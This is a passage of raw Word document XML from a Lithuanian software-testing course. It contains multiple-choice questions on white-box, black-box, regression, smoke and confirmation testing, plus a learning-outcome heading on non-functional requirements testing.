      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas iš vartotojo perspektyvos, bet tikrinant duomen</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> duomenų bazėje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Ką vadiname baltos d</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ėžės testavimu?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programos testavimas kai žinome programos kodą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Programos testavimas kai nežinome programos kodo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t>estavimas</w:t>
      </w:r>
      <w:r w:rsidR="005811B8" w:rsidRPr="00AD4464">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> kuris yra paremtas vid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ine struktūros analize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00155635" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas iš vartotojo perspektyvos,</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> tikrinant duomen</w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>duomenų bazėje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DC6DDA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokie yra juodos dėžės testavimo privalumai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00DC6DDA" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Testuotojas puikiai žino programos </w:t>
      </w:r>
      <w:r w:rsidR="001121E5" w:rsidRPr="00AD4464">
        <w:t>vid</w:t>
      </w:r>
      <w:r w:rsidR="00F70621" w:rsidRPr="00AD4464">
        <w:t>inę struktūrą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas ir programuotojas nepriklauso vienas nuo kito</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuojama iš naudotojo perspektyvos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gali būti ištestuoti tik tam tikri įvesties poaibiai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Kokie yra baltos dėžės </w:t>
      </w:r>
      <w:r w:rsidR="00E97912" w:rsidRPr="00AD4464">
        <w:t>trūkumai</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuo</w:t>
      </w:r>
      <w:r w:rsidR="000044DF" w:rsidRPr="00AD4464">
        <w:t>tojas puikiai žino programos vid</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>inę struktūrą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas ir programuotojas nepriklauso vienas nuo kito</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000044DF" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Parenkami duomenys, kad būtų ištestuoti visi galimi į</w:t>
      </w:r>
      <w:r w:rsidR="00F70621" w:rsidRPr="00AD4464">
        <w:t>vesties poaibiai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F70621" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Padeda optimizuoti kodą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E97912" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kokie yra juodo</w:t>
      </w:r>
      <w:r w:rsidR="000044DF" w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> dėžės trūkumai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E97912" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sunku sukurti testavimo atvejus, neturint tikslių specifikacijų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000044DF" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Testavimo atvejai gali </w:t>
      </w:r>
      <w:r w:rsidR="00E97912" w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E97912" w:rsidRPr="00AD4464">
        <w:t>rtotis, testuotojas nežino, ką programuotojas ištestavo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000044DF" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gali likti neištestuota daug</w:t>
      </w:r>
      <w:r w:rsidR="00E97912" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> kelių per programą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E97912" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testuotojas jaučiasi izoliuotas nuo ko</w:t>
      </w:r>
      <w:r w:rsidR="000044DF" w:rsidRPr="00AD4464">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>andos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0059627F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Suskirstykite testavim</w:t>
      </w:r>
      <w:r w:rsidR="00C472BE" w:rsidRPr="00AD4464">
        <w:t>o metodus pagal testavimo tipus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C472BE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="004A5839" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">estavimas </w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>pagal reikalavim</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ų specifikaciją; n</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>ašumo testavimas;</w:t>
      </w:r>
      <w:r w:rsidR="004A5839" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00733A92" w:rsidRPr="00AD4464">
        <w:t>akinių testa</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>vimas;</w:t>
      </w:r>
      <w:r w:rsidR="0059627F" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>pkrovos testavimas;</w:t>
      </w:r>
      <w:r w:rsidR="004A5839" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>tšakų testavimas;</w:t>
      </w:r>
      <w:r w:rsidR="0059627F" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>cenarijų testavimas;</w:t>
      </w:r>
      <w:r w:rsidR="004A5839" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>elių testavimas;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> m</w:t>
      </w:r>
      <w:r w:rsidR="0059627F" w:rsidRPr="00AD4464">
        <w:t>odifikuotas sprendimų testavimas</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>; a</w:t>
      </w:r>
      <w:r w:rsidR="00684867" w:rsidRPr="00AD4464">
        <w:t>tsitiktinis testavimas;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> p</w:t>
      </w:r>
      <w:r w:rsidR="009E6DC7" w:rsidRPr="00AD4464">
        <w:t>anaudos atvejų testavimas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A5839" w:rsidRPr="00AD4464" w:rsidRDefault="004A5839" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>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6"/>
        <w:gridCol w:w="4595"/>
      </w:tblGrid>
      <w:tr w:rsidR="0059627F" w:rsidRPr="00AD4464" w:rsidTr="00EB206D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="0059627F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>Juodosios dėžės testavimo metodai:</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59627F" w:rsidRPr="00AD4464" w:rsidRDefault="0059627F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="0059627F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:lastRenderedPageBreak/>
              <w:t>Baltosios dėžės testavimo metodai:</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59627F" w:rsidRPr="00AD4464" w:rsidRDefault="0059627F" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00950D2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra regresijos testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00950D2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas atliekamas su tikslu įsitikinti, kad defektas yra ištaisytas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00950D2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas atliekamas su tikslu įsitikinti, kad visos sistemos funkcij</w:t>
      </w:r>
      <w:r w:rsidR="007D4D57" w:rsidRPr="00AD4464">
        <w:t>os veikia po sistemos ar jos da</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>lies pakeitimo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00950D2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas atliekamas su tikslu įsitikinti, kad sistema atlieką funkcijas, kurias turi atlikti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="007D4D57" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Testavimas atlieka</w:t>
      </w:r>
      <w:r w:rsidR="00950D2D" w:rsidRPr="00AD4464">
        <w:t>mas su tikslu įsit</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ikinti, kad</w:t>
      </w:r>
      <w:r w:rsidR="00950D2D" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sistema neatlieka to, ko atlikti neturi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00950D2D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kas yra baziniai (smoke) testai?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00457828" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Sudėtingi verslo scenari</w:t>
      </w:r>
      <w:r w:rsidR="00CC61B2" w:rsidRPr="00AD4464">
        <w:t>jai, patikrinantys visą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> sistemą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00457828" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Baziniai visos sistemos testai, </w:t>
      </w:r>
      <w:r w:rsidR="00CC61B2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">tam </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>kad įsitikinti, jog verta testuoti toliau</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00457828" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Vartotojo priėmimo testų poaibis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00457828" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Automatiniai integraciniai testai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00263343" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> Kas yra patvirtinimo testavimas?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00263343" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Regresijos testų dalis</w:t>
      </w:r>
      <w:r w:rsidR="00B802A8" w:rsidRPr="00AD4464">
        <w:t>, vykdoma sistemos surinkimo metu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006032C6" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pakartotinis</w:t>
      </w:r>
      <w:r w:rsidR="00CC61B2" w:rsidRPr="00AD4464">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> anksčiau nesė</w:t>
      </w:r>
      <w:r w:rsidR="00263343" w:rsidRPr="00AD4464">
        <w:t>kmingai įvykdyto testavimo atvejo vykdymas, siekiant įsitikinti, kad defektas ištaisytas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00263343" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pakartotinis testavimas po atliktų pakeitimų, siekiant patvirtinti, jog neatsirado naujų defe</w:t>
      </w:r>
      <w:r w:rsidR="00CC61B2" w:rsidRPr="00AD4464">
        <w:t>ktų nekeistose sistemos vietose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009F77CA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Hlk14110828"/>
      <w:bookmarkStart w:id="123" w:name="_Toc14392431"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testuoti nefukcinius programinės įrangos reikalavimus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00684867" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> NEFUNKCINIŲ REIKALAVIMŲ TESTAVIMAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A72E3F" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
